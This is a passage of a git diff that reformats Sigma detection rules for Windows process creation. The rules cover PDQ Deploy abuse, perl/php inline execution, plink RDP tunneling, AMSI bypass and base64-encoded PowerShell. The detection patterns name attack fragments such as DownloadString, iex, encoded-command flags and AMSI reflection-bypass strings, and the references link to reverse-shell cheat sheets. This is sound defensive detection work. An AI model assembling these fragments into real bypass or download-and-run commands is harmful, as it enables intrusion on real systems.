b/sigma/sysmon/process_creation/proc_creation_win_pdqdeploy_execution.yml @@ -1,8 +1,8 @@ title: PDQ Deploy Remote Adminstartion Tool Execution id: d679950c-abb7-43a6-80fb-2a480c4fc450 related: - - id: 12b8e9f5-96b2-41e1-9a42-8c6779a5c184 - type: similar + - id: 12b8e9f5-96b2-41e1-9a42-8c6779a5c184 + type: similar status: test description: Detect use of PDQ Deploy remote admin tool references: @@ -24,10 +24,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Description: PDQ Deploy Console - - Product: PDQ Deploy - - Company: PDQ.com - - OriginalFileName: PDQDeployConsole.exe + - Description: PDQ Deploy Console + - Product: PDQ Deploy + - Company: PDQ.com + - OriginalFileName: PDQDeployConsole.exe condition: process_creation and selection falsepositives: - Legitimate use diff --git a/sigma/sysmon/process_creation/proc_creation_win_pdqdeploy_runner_susp_children.yml b/sigma/sysmon/process_creation/proc_creation_win_pdqdeploy_runner_susp_children.yml index daf207356..9f2eb78a2 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_pdqdeploy_runner_susp_children.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_pdqdeploy_runner_susp_children.yml @@ -1,12 +1,10 @@ title: Suspicious Execution Of PDQDeployRunner id: 12b8e9f5-96b2-41e1-9a42-8c6779a5c184 related: - - id: d679950c-abb7-43a6-80fb-2a480c4fc450 - type: similar + - id: d679950c-abb7-43a6-80fb-2a480c4fc450 + type: similar status: test -description: Detects suspicious execution of "PDQDeployRunner" which is part of the - PDQDeploy service stack that is responsible for executing commands and packages - on a remote machines +description: Detects suspicious execution of "PDQDeployRunner" which is part of the PDQDeploy service stack that is responsible for executing commands and packages on a remote machines references: - https://twitter.com/malmoeb/status/1550483085472432128 author: Nasreddine Bencherchali (Nextron Systems) @@ -24,35 +22,37 @@ detection: selection_parent: ParentImage|contains: PDQDeployRunner- selection_susp: - - Image|endswith: - - \wscript.exe - - \cscript.exe - - \rundll32.exe - - \regsvr32.exe - - \wmic.exe - - \msiexec.exe - - \mshta.exe - - \csc.exe - - \dllhost.exe - - \certutil.exe - - \scriptrunner.exe - - \bash.exe - - \wsl.exe - - Image|contains: - - C:\Users\Public\ - - C:\ProgramData\ - - C:\Windows\TEMP\ - - \AppData\Local\Temp - - CommandLine|contains: - - 'iex ' - - Invoke- - - DownloadString - - http - - ' -enc ' - - ' -encodedcommand ' - - FromBase64String - - ' -decode ' - - ' -w hidden' + # Improve this section by adding other suspicious processes, commandlines or paths + - Image|endswith: + # If you use any of the following processes legitimately comment them out + - \wscript.exe + - \cscript.exe + - \rundll32.exe + - \regsvr32.exe + - \wmic.exe + - \msiexec.exe + - \mshta.exe + - \csc.exe + - \dllhost.exe + - \certutil.exe + - \scriptrunner.exe + - \bash.exe + - \wsl.exe + - Image|contains: + - C:\Users\Public\ + - C:\ProgramData\ + - C:\Windows\TEMP\ + - \AppData\Local\Temp + - CommandLine|contains: + - 'iex ' + - Invoke- + - DownloadString + - http + - ' -enc ' + - ' -encodedcommand ' + - FromBase64String + - ' -decode ' + - ' -w hidden' condition: process_creation and (all of selection_*) falsepositives: - Legitimate use of the PDQDeploy tool to execute these commands diff --git a/sigma/sysmon/process_creation/proc_creation_win_perl_inline_command_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_perl_inline_command_execution.yml index 9a21533dd..41d533b53 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_perl_inline_command_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_perl_inline_command_execution.yml @@ -1,8 +1,7 @@ title: Perl Inline Command Execution id: f426547a-e0f7-441a-b63e-854ac5bdf54d status: test -description: Detects execution of perl using the "-e"/"-E" flags. This is could be - used as a way to launch a reverse shell or execute live perl code. +description: Detects execution of perl using the "-e"/"-E" flags. This is could be used as a way to launch a reverse shell or execute live perl code. references: - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet - https://www.revshells.com/ @@ -20,10 +19,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \perl.exe - - OriginalFileName: perl.exe + - Image|endswith: \perl.exe + - OriginalFileName: perl.exe # Also covers perlX.XX.exe selection_cli: - CommandLine|contains: ' -e' + CommandLine|contains: ' -e' condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_php_inline_command_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_php_inline_command_execution.yml index b0da970e3..6d60b571c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_php_inline_command_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_php_inline_command_execution.yml @@ -1,8 +1,7 @@ title: Php Inline Command Execution id: d81871ef-5738-47ab-9797-7a9c90cd4bfb status: test -description: Detects execution of php using the "-r" flag. This is could be used as - a way to launch a reverse shell or execute live php code. +description: Detects execution of php using the "-r" flag. This is could be used as a way to launch a reverse shell or execute live php code. references: - https://www.php.net/manual/en/features.commandline.php - https://www.revshells.com/ @@ -21,10 +20,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \php.exe - - OriginalFileName: php.exe + - Image|endswith: \php.exe + - OriginalFileName: php.exe selection_cli: - CommandLine|contains: ' -r' + CommandLine|contains: ' -r' condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_ping_hex_ip.yml b/sigma/sysmon/process_creation/proc_creation_win_ping_hex_ip.yml index 17521d4d5..370b6d8a8 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_ping_hex_ip.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_ping_hex_ip.yml @@ -22,7 +22,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \ping.exe - CommandLine|contains: 0x + CommandLine|contains: 0x condition: process_creation and selection fields: - ParentCommandLine diff --git a/sigma/sysmon/process_creation/proc_creation_win_pktmon_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_pktmon_execution.yml index 8607cd77e..aecd8a96b 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_pktmon_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_pktmon_execution.yml @@ -19,8 +19,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: \pktmon.exe - - OriginalFileName: PktMon.exe + - Image|endswith: \pktmon.exe + - OriginalFileName: PktMon.exe condition: process_creation and selection falsepositives: - Legitimate use diff --git a/sigma/sysmon/process_creation/proc_creation_win_plink_port_forwarding.yml b/sigma/sysmon/process_creation/proc_creation_win_plink_port_forwarding.yml index 36b8d8227..8638d80ce 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_plink_port_forwarding.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_plink_port_forwarding.yml @@ -23,7 +23,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Description: Command-line SSH, Telnet, and Rlogin client - CommandLine|contains: ' -R ' + CommandLine|contains: ' -R ' condition: process_creation and selection falsepositives: - Administrative activity using a remote port forwarding to a local port diff --git a/sigma/sysmon/process_creation/proc_creation_win_plink_susp_tunneling.yml b/sigma/sysmon/process_creation/proc_creation_win_plink_susp_tunneling.yml index 8bd68c610..8d66807d0 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_plink_susp_tunneling.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_plink_susp_tunneling.yml @@ -1,8 +1,8 @@ title: Potential RDP Tunneling Via SSH Plink id: f38ce0b9-5e97-4b47-a211-7dc8d8b871da related: - - id: f7d7ebd5-a016-46e2-9c54-f9932f2d386d - type: similar + - id: f7d7ebd5-a016-46e2-9c54-f9932f2d386d # ssh.exe + type: similar status: test description: Execution of plink to perform data exfiltration and tunneling references: @@ -23,12 +23,12 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection_a: Image|endswith: \plink.exe - CommandLine|contains: :127.0.0.1:3389 + CommandLine|contains: :127.0.0.1:3389 selection_b1: Image|endswith: \plink.exe - CommandLine|contains: :3389 + CommandLine|contains: :3389 selection_b2: - CommandLine|contains: + CommandLine|contains: - ' -P 443' - ' -P 22' condition: process_creation and (selection_a or all of selection_b*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_powercfg_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_powercfg_execution.yml index 43c276590..b5067a04e 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powercfg_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powercfg_execution.yml @@ -1,8 +1,7 @@ title: Suspicious Powercfg Execution To Change Lock Screen Timeout id: f8d6a15e-4bc8-4c27-8e5d-2b10f0b73e5b status: test -description: Detects suspicious execution of 'Powercfg.exe' to change lock screen - timeout +description: Detects suspicious execution of 'Powercfg.exe' to change lock screen timeout references: - https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html - https://learn.microsoft.com/en-us/windows-hardware/design/device-experiences/powercfg-command-line-options @@ -19,17 +18,20 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_power: - - Image|endswith: \powercfg.exe - - OriginalFileName: PowerCfg.exe + - Image|endswith: \powercfg.exe + - OriginalFileName: PowerCfg.exe selection_standby: - - CommandLine|contains|all: - - '/setacvalueindex ' - - SCHEME_CURRENT - - SUB_VIDEO - - VIDEOCONLOCK - - CommandLine|contains|all: - - '-change ' - - -standby-timeout- + # powercfg.exe /SETACVALUEINDEX SCHEME_CURRENT SUB_VIDEO VIDEOCONLOCK + - CommandLine|contains|all: + - '/setacvalueindex ' + - SCHEME_CURRENT + - SUB_VIDEO + - VIDEOCONLOCK + # powercfg -change -standby-timeout-dc 3000 + # powercfg -change -standby-timeout-ac 3000 + - CommandLine|contains|all: + - '-change ' + - -standby-timeout- condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_aadinternals_cmdlets_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_aadinternals_cmdlets_execution.yml index 504698898..5208d909c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_aadinternals_cmdlets_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_aadinternals_cmdlets_execution.yml @@ -1,12 +1,10 @@ title: AADInternals PowerShell Cmdlets Execution - ProccessCreation id: c86500e9-a645-4680-98d7-f882c70c1ea3 related: - - id: 91e69562-2426-42ce-a647-711b8152ced6 - type: similar + - id: 91e69562-2426-42ce-a647-711b8152ced6 + type: similar status: test -description: Detects ADDInternals Cmdlet execution. A tool for administering Azure - AD and Office 365. Which can be abused by threat actors to attack Azure AD or - Office 365. +description: Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365. references: - https://o365blog.com/aadinternals/ - https://github.com/Gerenios/AADInternals @@ -27,14 +25,15 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.Exe - - pwsh.dll + - Image|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.Exe + - pwsh.dll selection_cli: - CommandLine|contains: + CommandLine|contains: + # Since most of the cmdlets use a unique enough string which is "-AADInt" we only used that portion. For a complete list please check the references linked above - Add-AADInt - ConvertTo-AADInt - Disable-AADInt diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_active_directory_module_dll_import.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_active_directory_module_dll_import.yml index ac28ebf57..9a98347f3 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_active_directory_module_dll_import.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_active_directory_module_dll_import.yml @@ -1,13 +1,12 @@ title: Potential Active Directory Enumeration Using AD Module - ProcCreation id: 70bc5215-526f-4477-963c-a47a5c9ebd12 related: - - id: 9e620995-f2d8-4630-8430-4afd89f77604 - type: similar - - id: 74176142-4684-4d8a-8b0a-713257e7df8e - type: similar + - id: 9e620995-f2d8-4630-8430-4afd89f77604 + type: similar + - id: 74176142-4684-4d8a-8b0a-713257e7df8e + type: similar status: test -description: Detects usage of the "Import-Module" cmdlet to load the "Microsoft.ActiveDirectory.Management.dl" - DLL. Which is often used by attackers to perform AD enumeration. +description: Detects usage of the "Import-Module" cmdlet to load the "Microsoft.ActiveDirectory.Management.dl" DLL. Which is often used by attackers to perform AD enumeration. references: - https://github.com/samratashok/ADModule - https://twitter.com/cyb3rops/status/1617108657166061568?s=20 @@ -27,18 +26,18 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - Image|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_cmdlet: - CommandLine|contains: + CommandLine|contains: - 'Import-Module ' - 'ipmo ' selection_dll: - CommandLine|contains: Microsoft.ActiveDirectory.Management.dll + CommandLine|contains: Microsoft.ActiveDirectory.Management.dll condition: process_creation and (all of selection_*) falsepositives: - Legitimate use of the library for administrative activity diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_add_windows_capability.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_add_windows_capability.yml index 84e3244aa..d2fea9a9c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_add_windows_capability.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_add_windows_capability.yml @@ -1,11 +1,10 @@ title: Add Windows Capability Via PowerShell Cmdlet id: b36d01a3-ddaf-4804-be18-18a6247adfcd related: - - id: 155c7fd5-47b4-49b2-bbeb-eb4fab335429 - type: similar + - id: 155c7fd5-47b4-49b2-bbeb-eb4fab335429 + type: similar status: experimental -description: Detects usage of the "Add-WindowsCapability" cmdlet to add Windows capabilities. - Notable capabilities could be "OpenSSH" and others. +description: Detects usage of the "Add-WindowsCapability" cmdlet to add Windows capabilities. Notable capabilities could be "OpenSSH" and others. references: - https://learn.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse?tabs=powershell - https://www.virustotal.com/gui/file/af1c82237b6e5a3a7cdbad82cc498d298c67845d92971bada450023d1335e267/content @@ -23,19 +22,18 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - Image|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_cmdlet: - CommandLine|contains: Add-WindowsCapability + CommandLine|contains: Add-WindowsCapability selection_capa: - CommandLine|contains: OpenSSH. + CommandLine|contains: OpenSSH. # For both "OpenSSH.Server" and "OpenSSH.Client" condition: process_creation and (all of selection_*) falsepositives: - - Legitimate usage of the capabilities by administrators or users. Add additional - filters accordingly. + - Legitimate usage of the capabilities by administrators or users. Add additional filters accordingly. level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_amsi_init_failed_bypass.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_amsi_init_failed_bypass.yml index 62e9fa845..0fcbb37c2 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_amsi_init_failed_bypass.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_amsi_init_failed_bypass.yml @@ -1,11 +1,10 @@ title: Potential AMSI Bypass Via .NET Reflection id: 30edb182-aa75-42c0-b0a9-e998bb29067c related: - - id: 4f927692-68b5-4267-871b-073c45f4f6fe - type: obsoletes + - id: 4f927692-68b5-4267-871b-073c45f4f6fe + type: obsoletes status: test -description: Detects Request to "amsiInitFailed" that can be used to disable AMSI - Scanning +description: Detects Request to "amsiInitFailed" that can be used to disable AMSI Scanning references: - https://s3cur3th1ssh1t.github.io/Bypass_AMSI_by_manual_modification/ - https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/ @@ -24,11 +23,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_1: - CommandLine|contains: + CommandLine|contains: - System.Management.Automation.AmsiUtils - amsiInitFailed selection_2: - CommandLine|contains|all: + CommandLine|contains|all: - '[Ref].Assembly.GetType' - SetValue($null,$true) - NonPublic,Static diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_amsi_null_bits_bypass.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_amsi_null_bits_bypass.yml index e8c37ecb2..8cd9fe7ec 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_amsi_null_bits_bypass.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_amsi_null_bits_bypass.yml @@ -1,11 +1,10 @@ title: Potential AMSI Bypass Using NULL Bits id: 92a974db-ab84-457f-9ec0-55db83d7a825 related: - - id: fa2559c8-1197-471d-9cdd-05a0273d4522 - type: similar + - id: fa2559c8-1197-471d-9cdd-05a0273d4522 + type: similar status: experimental -description: Detects usage of special strings/null bits in order to potentially bypass - AMSI functionalities +description: Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities references: - https://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#amsi-bypass-using-null-bits-satoshi author: Nasreddine Bencherchali (Nextron Systems) @@ -23,7 +22,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: - if(0){{{0}}}' -f $(0 -as [char]) + - '#' condition: process_creation and selection diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_audio_capture.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_audio_capture.yml index fd9d31779..34bd73938 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_audio_capture.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_audio_capture.yml @@ -6,8 +6,7 @@ references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1123/T1123.md - https://eqllib.readthedocs.io/en/latest/analytics/ab7a6ef4-0983-4275-a4f1-5c6bd3c31c23.html - https://github.com/frgnca/AudioDeviceCmdlets -author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community, - Nasreddine Bencherchali (Nextron Systems) +author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community, Nasreddine Bencherchali (Nextron Systems) date: 2019/10/24 modified: 2023/04/06 tags: @@ -22,7 +21,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: - WindowsAudioDevice-Powershell-Cmdlet - Toggle-AudioDevice - 'Get-AudioDevice ' diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_base64_encoded_cmd.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_base64_encoded_cmd.yml index e4ead885c..4abdaeb33 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_base64_encoded_cmd.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_base64_encoded_cmd.yml @@ -1,12 +1,10 @@ title: Suspicious Encoded PowerShell Command Line id: ca2092a1-c273-4878-9b4b-0d60115bf5ea status: test -description: Detects suspicious powershell process starts with base64 encoded commands - (e.g. Emotet) +description: Detects suspicious powershell process starts with base64 encoded commands (e.g. Emotet) references: - https://app.any.run/tasks/6217d77d-3189-4db2-a957-8ab239f3e01e -author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, - Anton Kutepov, oscd.community +author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community date: 2018/09/03 modified: 2023/04/06 tags: @@ -21,16 +19,16 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - Image|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_cli_enc: - CommandLine|contains: ' -e' + CommandLine|contains: ' -e' # covers -en and -enc selection_cli_content: - CommandLine|contains: + CommandLine|contains: - ' JAB' - ' SUVYI' - ' SQBFAFgA' @@ -41,12 +39,11 @@ detection: - ' UwB' - ' cwB' selection_standalone: - CommandLine|contains: + CommandLine|contains: - '.exe -ENCOD ' - - ' BA^J e-' + - ' BA^J e-' # Reversed filter_optional_remote_signed: - CommandLine|contains: ' -ExecutionPolicy remotesigned ' - condition: process_creation and (selection_img and (all of selection_cli_* or - selection_standalone) and not 1 of filter_optional_*) + CommandLine|contains: ' -ExecutionPolicy remotesigned ' + condition: process_creation and (selection_img and (all of selection_cli_* or selection_standalone) and not 1 of filter_optional_*) level: high ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_base64_frombase64string.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_base64_frombase64string.yml index 89385b6a4..841c26fe4 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_base64_frombase64string.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_base64_frombase64string.yml @@ -1,8 +1,7 @@ title: PowerShell Base64 Encoded FromBase64String Cmdlet id: fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c status: test -description: Detects usage of a base64 encoded "FromBase64String" cmdlet in a process - command line +description: Detects usage of a base64 encoded "FromBase64String" cmdlet in a process command line references: - Internal Research author: Florian Roth (Nextron Systems) @@ -22,11 +21,12 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - CommandLine|base64offset|contains: ::FromBase64String - - CommandLine|contains: - - OgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcA - - oAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnA - - 6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZw + - CommandLine|base64offset|contains: ::FromBase64String + # UTF-16 LE + - CommandLine|contains: + - OgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcA + - oAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnA + - 6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZw condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_base64_iex.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_base64_iex.yml index 9eb24f190..df3ee508a 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_base64_iex.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_base64_iex.yml @@ -19,30 +19,31 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - CommandLine|base64offset|contains: - - IEX ([ - - iex ([ - - iex (New - - IEX (New - - IEX([ - - iex([ - - iex(New - - IEX(New - - IEX((' - - iex((' - - CommandLine|contains: - - SQBFAFgAIAAoAFsA - - kARQBYACAAKABbA - - JAEUAWAAgACgAWw - - aQBlAHgAIAAoAFsA - - kAZQB4ACAAKABbA - - pAGUAeAAgACgAWw - - aQBlAHgAIAAoAE4AZQB3A - - kAZQB4ACAAKABOAGUAdw - - pAGUAeAAgACgATgBlAHcA - - SQBFAFgAIAAoAE4AZQB3A - - kARQBYACAAKABOAGUAdw - - JAEUAWAAgACgATgBlAHcA + - CommandLine|base64offset|contains: + - IEX ([ + - iex ([ + - iex (New + - IEX (New + - IEX([ + - iex([ + - iex(New + - IEX(New + - IEX((' + - iex((' + # UTF16 LE + - CommandLine|contains: + - SQBFAFgAIAAoAFsA + - kARQBYACAAKABbA + - JAEUAWAAgACgAWw + - aQBlAHgAIAAoAFsA + - kAZQB4ACAAKABbA + - pAGUAeAAgACgAWw + - aQBlAHgAIAAoAE4AZQB3A + - kAZQB4ACAAKABOAGUAdw + - pAGUAeAAgACgATgBlAHcA + - SQBFAFgAIAAoAE4AZQB3A + - kARQBYACAAKABOAGUAdw + - JAEUAWAAgACgATgBlAHcA condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_base64_invoke.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_base64_invoke.yml index 9d5ac60e5..d0d300a5b 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_base64_invoke.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_base64_invoke.yml @@ -1,8 +1,8 @@ title: PowerShell Base64 Encoded Invoke Keyword id: 6385697e-9f1b-40bd-8817-f4a91f40508e related: - - id: fd6e2919-3936-40c9-99db-0aa922c356f7 - type: obsoletes + - id: fd6e2919-3936-40c9-99db-0aa922c356f7 + type: obsoletes status: test description: Detects UTF-8 and UTF-16 Base64 encoded powershell 'Invoke-' calls references: @@ -24,19 +24,22 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - Image|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_cli_enc: - CommandLine|contains: ' -e' + CommandLine|contains: ' -e' selection_cli_invoke: - CommandLine|contains: + CommandLine|contains: + # Invoke- + # UTF-16LE - SQBuAHYAbwBrAGUALQ - kAbgB2AG8AawBlAC0A - JAG4AdgBvAGsAZQAtA + # UTF-8 - SW52b2tlL - ludm9rZS - JbnZva2Ut diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_base64_mppreference.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_base64_mppreference.yml index 253932d7f..955760952 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_base64_mppreference.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_base64_mppreference.yml @@ -1,8 +1,7 @@ title: Powershell Base64 Encoded MpPreference Cmdlet id: c6fb44c6-71f5-49e6-9462-1425d328aee3 status: test -description: Detects base64 encoded "MpPreference" PowerShell cmdlet code that tries - to modifies or tamper with Windows Defender AV +description: Detects base64 encoded "MpPreference" PowerShell cmdlet code that tries to modifies or tamper with Windows Defender AV references: - https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md @@ -22,24 +21,25 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - CommandLine|base64offset|contains: - - 'Add-MpPreference ' - - 'Set-MpPreference ' - - 'add-mppreference ' - - 'set-mppreference ' - - CommandLine|contains: - - QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgA - - EAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIA - - BAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAA - - UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgA - - MAZQB0AC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIA - - TAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAA - - YQBkAGQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgA - - EAZABkAC0AbQBwAHAAcgBlAGYAZQByAGUAbgBjAGUAIA - - hAGQAZAAtAG0AcABwAHIAZQBmAGUAcgBlAG4AYwBlACAA - - cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgA - - MAZQB0AC0AbQBwAHAAcgBlAGYAZQByAGUAbgBjAGUAIA - - zAGUAdAAtAG0AcABwAHIAZQBmAGUAcgBlAG4AYwBlACAA + - CommandLine|base64offset|contains: + - 'Add-MpPreference ' + - 'Set-MpPreference ' + - 'add-mppreference ' + - 'set-mppreference ' + - CommandLine|contains: + # UTF16-LE + - QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgA + - EAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIA + - BAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAA + - UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgA + - MAZQB0AC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIA + - TAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAA + - YQBkAGQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgA + - EAZABkAC0AbQBwAHAAcgBlAGYAZQByAGUAbgBjAGUAIA + - hAGQAZAAtAG0AcABwAHIAZQBmAGUAcgBlAG4AYwBlACAA + - cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgA + - MAZQB0AC0AbQBwAHAAcgBlAGYAZQByAGUAbgBjAGUAIA + - zAGUAdAAtAG0AcABwAHIAZQBmAGUAcgBlAG4AYwBlACAA condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_base64_reflection_assembly_load.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_base64_reflection_assembly_load.yml index d672b467c..357a3cd38 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_base64_reflection_assembly_load.yml +++ 